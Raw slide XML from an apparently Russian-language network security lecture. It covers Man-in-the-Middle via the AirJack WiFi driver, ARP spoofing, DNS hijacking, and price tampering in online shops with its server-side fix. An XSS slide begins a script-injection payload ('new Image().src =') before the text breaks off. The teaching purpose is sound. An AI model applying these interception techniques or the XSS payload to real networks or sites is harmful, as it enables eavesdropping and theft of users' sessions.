                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                      </p:childTnLst>
                    </p:cTn>
                  </p:par>
                  <p:par>
                    <p:cTn id="7" nodeType="clickEffect" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="8" nodeType="withEffect" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="9" nodeType="clickEffect" fill="hold" presetClass="entr" presetID="1">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="351">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3"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en-US" sz="3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Man-in-the-Middle</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="354" name="Text Box 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285840" y="1719360"/>
            <a:ext cx="8398800" cy="4779360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>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Примеры</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="689040" indent="-347760" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="649"/>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600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>«Сказка о царе Салтане»</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="689040" indent="-347760" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="649"/>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600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Драйвер </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>AirJack </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>для </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>WiFi </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>делает сетевую карту точкой доступа, к которой автоматически подключаются незнающие пользователи. Их запросы перенаправляются на реальную точку доступа. Ответы проходят через компьютер хакера. Так можно, например, без труда заменить видео, транслируемое </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>WiFi-</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>камерой слежения</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="341280" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="751"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="355" name="Text Box 3"/>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142AA96A-75DC-4DAB-9F12-293D91052125}"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6"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en-US" sz="3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Man-in-the-Middle</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="357" name="Text Box 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1357200"/>
            <a:ext cx="8227440" cy="4771440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>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1" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>ARP-spoofing</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="341280" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="751"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="358" name="Text Box 3"/>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AF0591DB-B164-4715-826C-8567EF3CBF69}"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pic>
        <p:nvPicPr>
          <p:cNvPr id="359" name="Picture 4" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1298520" y="1785960"/>
            <a:ext cx="6414480" cy="489996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0"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en-US" sz="3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Man-in-the-Middle</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="361" name="Text Box 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1719360"/>
            <a:ext cx="8227440" cy="4409640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>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arn-CL" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>DNS hijacking</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="362" name="Text Box 3"/>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69AC84D5-6958-43F5-BDCF-5567B0B972EF}"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pic>
        <p:nvPicPr>
          <p:cNvPr id="363" name="Picture 4" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="971640" y="2421000"/>
            <a:ext cx="6932160" cy="428400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9"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3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>План</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="280" name="Text Box 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1719360"/>
            <a:ext cx="8227440" cy="4409640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>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Понятие сетевой безопасности</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>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Основные составляющие</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>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Сетевые угрозы (методы взлома)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>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Методы защиты</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="281" name="Text Box 3"/>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8ACFE576-BA97-4659-A262-1B5E89220FB3}"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4"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3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Ошибки программистов</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="365" name="Text Box 2"/>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3C26C252-602E-425F-9275-D1DE87EAE571}"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sp>
        <p:nvSpPr>
          <p:cNvPr id="366" name="Text Box 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1719360"/>
            <a:ext cx="8227440" cy="4409640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="799"/>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1" lang="ru-RU" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Пример</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="689040" indent="-347760" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="649"/>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600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>возможность изменения стоимости  покупаемого товара в интернет магазине </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="984240" indent="-290520" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="575"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="cccc00"/>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300" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>при добавлении товара в корзину его стоимость указывается в параметрах </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2300" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>GET </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2300" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>или </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2300" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>POST </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2300" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>запроса</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2300" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="984240" indent="-290520" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="575"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="cccc00"/>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300" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>при добавлении товара в корзину </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2300" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Javascript-</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2300" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>функция устанавливает </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2300" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2300" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> с указанной ценой</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2300" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="984240" indent="-290520" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="575"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="cccc00"/>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300" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Выход: должны указываться только </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2300" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>id </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2300" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>товаров, цена всегда берется из БД на сервере</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2300" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="985680" indent="-290520" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="575"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="23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7"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en-US" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>XSS – </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="ru-RU" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>межсайтовый скриптинг</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="3200"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="ru-RU" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Cross-site scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="ru-RU" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="368" name="Text Box 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285840" y="1428840"/>
            <a:ext cx="8398800" cy="5427000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="700"/>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800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>15 % всех обнаруженных уязвимостей</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="700"/>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800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>68% сайтов подвержены этой атаке</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="700"/>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800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>активный (срабатывает автоматически при загрузке страницы):</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="689040" indent="-347760" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>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400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>публикация на форумах или в комментариях сообщений с </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>javascript </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>кодом</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="689040" indent="-347760" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>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en-US" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:br>
              <a:rPr sz="2400"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>new Image().src</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
